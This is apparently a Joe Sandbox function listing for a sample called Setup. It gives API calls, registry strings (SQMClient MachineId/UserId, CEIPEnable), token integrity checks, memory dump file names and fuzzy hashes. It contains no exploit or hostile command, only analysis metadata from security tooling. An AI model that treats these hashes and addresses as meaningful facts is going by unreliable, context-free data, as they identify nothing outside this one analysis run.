                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 69A73ECE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: CEIPEnable
                                                                                                                                                                    • API String ID: 3677997916-1389088331
                                                                                                                                                                    • Opcode ID: f44f486f375cf5075b446ad5893c577b79054209feba2831c73bd0cebee80e7f
                                                                                                                                                                    • Instruction ID: a962e6408bac8f99d10ceae9b08f6a1fb440e216f4c957ca41ea5d244adcce3a
                                                                                                                                                                    • Opcode Fuzzy Hash: f44f486f375cf5075b446ad5893c577b79054209feba2831c73bd0cebee80e7f
                                                                                                                                                                    • Instruction Fuzzy Hash: F031B33A554398EFDB21CF44C986F9A7BE9BB41B84F054059FD119E0A4C3728AC1AB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB3439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB3440
                                                                                                                                                                    • PathStripToRootW.SHLWAPI(00000000,C600000B,69DAFA6E,00000010,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB34D8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB350D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to record SystemMemory, xrefs: 69DB3527
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorH_prolog3LastPathRootStrip
                                                                                                                                                                    • String ID: Failed to record SystemMemory
                                                                                                                                                                    • API String ID: 1831876552-335854511
                                                                                                                                                                    • Opcode ID: a74da9c3c4444248342b99c82189d75a566d9f318ce0f5107037c60836d01e61
                                                                                                                                                                    • Instruction ID: 17692889f45138d596ddeceb0380ed286ff48519215dea0e26c7ea6b20402c38
                                                                                                                                                                    • Opcode Fuzzy Hash: a74da9c3c4444248342b99c82189d75a566d9f318ce0f5107037c60836d01e61
                                                                                                                                                                    • Instruction Fuzzy Hash: 79318E75A00116DFCB00DBB4CD85AAEBBB9BF05368F109674E521EBA90CB34D901CBB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA7C9E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA7CA5
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7391D: __EH_prolog3.LIBCMT ref: 69D73924
                                                                                                                                                                      • Part of subcall function 69D7395E: __EH_prolog3.LIBCMT ref: 69D73965
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: Package Name = %s$Package Version = %s$Package details
                                                                                                                                                                    • API String ID: 431132790-2412997842
                                                                                                                                                                    • Opcode ID: 949b59577c3d04fabac9a4b7f81d18adc12236bea6d9cdb70400127d42337caa
                                                                                                                                                                    • Instruction ID: 21a0500bde0f7d87a392c5cd99eae4bf6684acba0169e10af27d5edecbe6450a
                                                                                                                                                                    • Opcode Fuzzy Hash: 949b59577c3d04fabac9a4b7f81d18adc12236bea6d9cdb70400127d42337caa
                                                                                                                                                                    • Instruction Fuzzy Hash: 38317CB5900149EFDF00DBA8C944FADBBB9AF0530CF148164E514EB7A0C775AA09CBB2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7712B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D77132
                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,00000010), ref: 69D77191
                                                                                                                                                                    • #195.MSI(00000010,00000000,00000104,00000000,00000000,00000104,00000010,MSI.dll), ref: 69D77200
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: #195FolderH_prolog3Path
                                                                                                                                                                    • String ID: MSI.dll
                                                                                                                                                                    • API String ID: 2462876523-3845536143
                                                                                                                                                                    • Opcode ID: 92d142eb363905892015cf274431a36b2b07a9cd64d4bd9b2c0e0c7766a9b104
                                                                                                                                                                    • Instruction ID: bbe1c01826ae8c4392f83abdff2a83d087157790742eff3f3af1ceab870a15fe
                                                                                                                                                                    • Opcode Fuzzy Hash: 92d142eb363905892015cf274431a36b2b07a9cd64d4bd9b2c0e0c7766a9b104
                                                                                                                                                                    • Instruction Fuzzy Hash: C83171B4900255DFDF04DFA8C889ABEBBB9BF04318F148578E510AB691C7749E05CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAF821 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69DA76A7: __EH_prolog3.LIBCMT ref: 69DA76AE
                                                                                                                                                                      • Part of subcall function 69DA76A7: GetModuleHandleW.KERNEL32(kernel32.dll,00000020,69DAF845,?), ref: 69DA7748
                                                                                                                                                                      • Part of subcall function 69DA76A7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 69DA7758
                                                                                                                                                                      • Part of subcall function 69DA76A7: SetThreadStackGuarantee.KERNEL32(00020000), ref: 69DA776D
                                                                                                                                                                      • Part of subcall function 69DA76A7: SetUnhandledExceptionFilter.KERNEL32(69DB416A), ref: 69DA7774
                                                                                                                                                                      • Part of subcall function 69DA76A7: GetCommandLineW.KERNEL32 ref: 69DA777A
                                                                                                                                                                    • _memset.LIBCMT ref: 69DAF85B
                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(DebugIronMan,?,000000FF,?,?,?), ref: 69DAF874
                                                                                                                                                                    • DebugBreak.KERNEL32(?,?,?), ref: 69DAF8B8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressBreakCommandDebugEnvironmentExceptionFilterGuaranteeH_prolog3HandleLineModuleProcStackThreadUnhandledVariable_memset
                                                                                                                                                                    • String ID: DebugIronMan
                                                                                                                                                                    • API String ID: 12115070-628588297
                                                                                                                                                                    • Opcode ID: 42f83e188ac858b46bc6a4a3b5f3c8e271d899ec09416d813523a7453b3ed714
                                                                                                                                                                    • Instruction ID: 0cfde095c04ba08440a584dcc25be28821e6ee600df89267ec26135ebe608834
                                                                                                                                                                    • Opcode Fuzzy Hash: 42f83e188ac858b46bc6a4a3b5f3c8e271d899ec09416d813523a7453b3ed714
                                                                                                                                                                    • Instruction Fuzzy Hash: BD11A9B550020AEAD710EF78CA0679AB3B8EF04764F4085B1D415D7641F770DA55D761
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69A73D03 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 69A73D28
                                                                                                                                                                      • Part of subcall function 69A7182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,69A72E5E,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A71897
                                                                                                                                                                      • Part of subcall function 69A7182C: RegQueryValueExW.KERNEL32(69A72E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A718B3
                                                                                                                                                                      • Part of subcall function 69A7182C: RegCloseKey.KERNEL32(69A72E5E,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 69A718D1
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,80000001,Software\Microsoft\SQMClient,UserId,?,00000027), ref: 69A73D74
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseErrorLastOpenQueryValuememset
                                                                                                                                                                    • String ID: Software\Microsoft\SQMClient$UserId
                                                                                                                                                                    • API String ID: 895213837-3032788761
                                                                                                                                                                    • Opcode ID: 6b05ad643580c459f245406798c720e7e0a6c0233723df09cc2a0fbf86e135c0
                                                                                                                                                                    • Instruction ID: 887e343be9cc7913408be7a0e10f24b37b673ed98cb0c43027e0938a59389c70
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b05ad643580c459f245406798c720e7e0a6c0233723df09cc2a0fbf86e135c0
                                                                                                                                                                    • Instruction Fuzzy Hash: 2621F33A510344BED720EEA4DDC6EBE7BEDBB41F84F154464E9029F161CBA2C9C48780
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69A72E0F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 69A72E34
                                                                                                                                                                      • Part of subcall function 69A7182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,69A72E5E,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A71897
                                                                                                                                                                      • Part of subcall function 69A7182C: RegQueryValueExW.KERNEL32(69A72E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A718B3
                                                                                                                                                                      • Part of subcall function 69A7182C: RegCloseKey.KERNEL32(69A72E5E,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 69A718D1
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 69A72E80
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseErrorLastOpenQueryValuememset
                                                                                                                                                                    • String ID: MachineId$Software\Microsoft\SQMClient
                                                                                                                                                                    • API String ID: 895213837-1718750536
                                                                                                                                                                    • Opcode ID: bd0b0bd2e304f6d2d61192353febd9ba60d367217c2499f52547f0599a962022
                                                                                                                                                                    • Instruction ID: 60708fed1334524815ad627d617be53fc44bfa3bfcfcccd68bac2eda6c378374
                                                                                                                                                                    • Opcode Fuzzy Hash: bd0b0bd2e304f6d2d61192353febd9ba60d367217c2499f52547f0599a962022
                                                                                                                                                                    • Instruction Fuzzy Hash: 6921023A150344BED720DEA48DC7EAF7BEDBB81B88F144068ED059F2A1C661C9C58B41
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698FD763 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _malloc.LIBCMT ref: 698FD771
                                                                                                                                                                      • Part of subcall function 698F8FCB: __FF_MSGBANNER.LIBCMT ref: 698F8FE4
                                                                                                                                                                      • Part of subcall function 698F8FCB: __NMSG_WRITE.LIBCMT ref: 698F8FEB
                                                                                                                                                                      • Part of subcall function 698F8FCB: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,698F91D6,?), ref: 698F9010
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 501242067-0
                                                                                                                                                                    • Opcode ID: 1d5d63b15a63e8ff588dbb1701b2cbd0f69826fa8f1acd0bc72c7cda7a5e6cda
                                                                                                                                                                    • Instruction ID: 33445a9ca5ebcd148416ea490f7d12fbe6115ec4eefd08759a683831401026a8
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d5d63b15a63e8ff588dbb1701b2cbd0f69826fa8f1acd0bc72c7cda7a5e6cda
                                                                                                                                                                    • Instruction Fuzzy Hash: 1311AB36909119ABCF115B78D80464A37A4EF563F4B20BD2EEA4ADE250DF34C84386D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69A73679 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,69A7332F,?), ref: 69A73683
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,69A7332F,?), ref: 69A736B3
                                                                                                                                                                      • Part of subcall function 69A72815: GetTokenInformation.KERNELBASE(?,69A7332F(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,69A736C7,?,00000001), ref: 69A72835
                                                                                                                                                                      • Part of subcall function 69A72815: GetLastError.KERNEL32(?,?,69A736C7,?,00000001,?,?,?,?,69A7332F,?), ref: 69A7283B
                                                                                                                                                                      • Part of subcall function 69A72815: GetTokenInformation.KERNELBASE(?,69A7332F(TokenIntegrityLevel),00000000,00000000,00000000,?,?,69A736C7,?,00000001,?,?,?,?,69A7332F,?), ref: 69A72863
                                                                                                                                                                    • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 69A736D5
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,00000001,?,?,?,?,69A7332F,?), ref: 69A736E0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Token$InformationProcess$ChangeCloseConvertCurrentErrorFindLastNotificationOpenString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3562588798-0
                                                                                                                                                                    • Opcode ID: 4ef35e14561f3b0e5f87ff8e3ca97bdb082cd324ebbeda35bfeddb4ea867dcd3
                                                                                                                                                                    • Instruction ID: e572783fa8089828a40b24221523409c2f5811167094cf05447b58b6976fdc46
                                                                                                                                                                    • Opcode Fuzzy Hash: 4ef35e14561f3b0e5f87ff8e3ca97bdb082cd324ebbeda35bfeddb4ea867dcd3
                                                                                                                                                                    • Instruction Fuzzy Hash: B711EF7A500355BFDB209F65D887EAE7AE8FF05BD4F068068F840EF240CB7189919790
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F91B7 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _malloc.LIBCMT ref: 698F91D1
                                                                                                                                                                      • Part of subcall function 698F8FCB: __FF_MSGBANNER.LIBCMT ref: 698F8FE4
                                                                                                                                                                      • Part of subcall function 698F8FCB: __NMSG_WRITE.LIBCMT ref: 698F8FEB
                                                                                                                                                                      • Part of subcall function 698F8FCB: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,698F91D6,?), ref: 698F9010
                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 698F9206
                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 698F9220
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698F9231
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 615853336-0
                                                                                                                                                                    • Opcode ID: d181d9a30762d3872794c70359b72c7a5bebd9318dc8ad434c8f38e9401f2812
                                                                                                                                                                    • Instruction ID: e37f0acbac780670daa7556d0294d83fd2298bf149079f002f2733e82f78e783
                                                                                                                                                                    • Opcode Fuzzy Hash: d181d9a30762d3872794c70359b72c7a5bebd9318dc8ad434c8f38e9401f2812
                                                                                                                                                                    • Instruction Fuzzy Hash: 31F0F43940410D6ADF08EF58C815A9D7BAAFB43398B502C1EE920E6190DB358A87C250
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DCC0AA Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _malloc.LIBCMT ref: 69DCC0C4
                                                                                                                                                                      • Part of subcall function 69DCBFB3: __FF_MSGBANNER.LIBCMT ref: 69DCBFCC
                                                                                                                                                                      • Part of subcall function 69DCBFB3: __NMSG_WRITE.LIBCMT ref: 69DCBFD3
                                                                                                                                                                      • Part of subcall function 69DCBFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,69DA831D,00000000,?,69DCC0C9,69DAF845,00000C00,00000020,69DAF845,?), ref: 69DCBFF8
                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 69DCC0F9
                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 69DCC113
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DCC124
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 615853336-0
                                                                                                                                                                    • Opcode ID: e95124dd784c7004a30a392a39f3d578ee642b14712aa1be115e9191e3201257
                                                                                                                                                                    • Instruction ID: 6065efa2ae80c386e912ddd809265cb6f5cef82389fea7c1c066202adf92b8cd
                                                                                                                                                                    • Opcode Fuzzy Hash: e95124dd784c7004a30a392a39f3d578ee642b14712aa1be115e9191e3201257
                                                                                                                                                                    • Instruction Fuzzy Hash: A8F02875800249EBCF05DFA8DD01B9E3A6CAB0235CF100479E961D7DC0DBB2DA18CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A35E5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,009A2AE3), ref: 009A35E8
                                                                                                                                                                    • __malloc_crt.LIBCMT ref: 009A3617
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009A3624
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 237123855-0
                                                                                                                                                                    • Opcode ID: 535eb0f723dfb9974726e21809b1aedb06433fa8c628d0f8d50e52d47dc7580b
                                                                                                                                                                    • Instruction ID: 25d60d14014096064d6cdc8e57cedeb8c40e5a5c612b31858b8899cdcf846812
                                                                                                                                                                    • Opcode Fuzzy Hash: 535eb0f723dfb9974726e21809b1aedb06433fa8c628d0f8d50e52d47dc7580b
                                                                                                                                                                    • Instruction Fuzzy Hash: 40F0827B9151206ACB216779BC4B95B672CDAD73A031B8457F406D7240FA208F8586E1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D76961 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 262COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
